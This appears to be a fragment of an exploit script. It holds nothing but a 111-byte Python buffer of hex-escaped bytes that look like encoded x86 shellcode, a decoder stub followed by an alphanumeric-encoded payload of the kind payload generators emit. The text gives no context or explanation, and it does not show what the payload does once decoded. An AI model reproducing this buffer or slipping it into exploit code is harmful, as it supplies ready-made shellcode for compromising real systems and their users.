# 111 bytes
buf =  ""
buf += "\x89\xe3\xdb\xc0\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33"
buf += "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41"
buf += "\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41"
buf += "\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a"
buf += "\x4a\x49\x50\x31\x38\x49\x4a\x57\x4b\x51\x48\x30\x34"
buf += "\x4b\x56\x31\x33\x58\x56\x4f\x36\x4f\x43\x43\x43\x58"
buf += "\x53\x58\x46\x4f\x42\x42\x45\x39\x32\x4e\x4d\x59\x4b"
buf += "\x53\x58\x4d\x4b\x30\x41\x41"
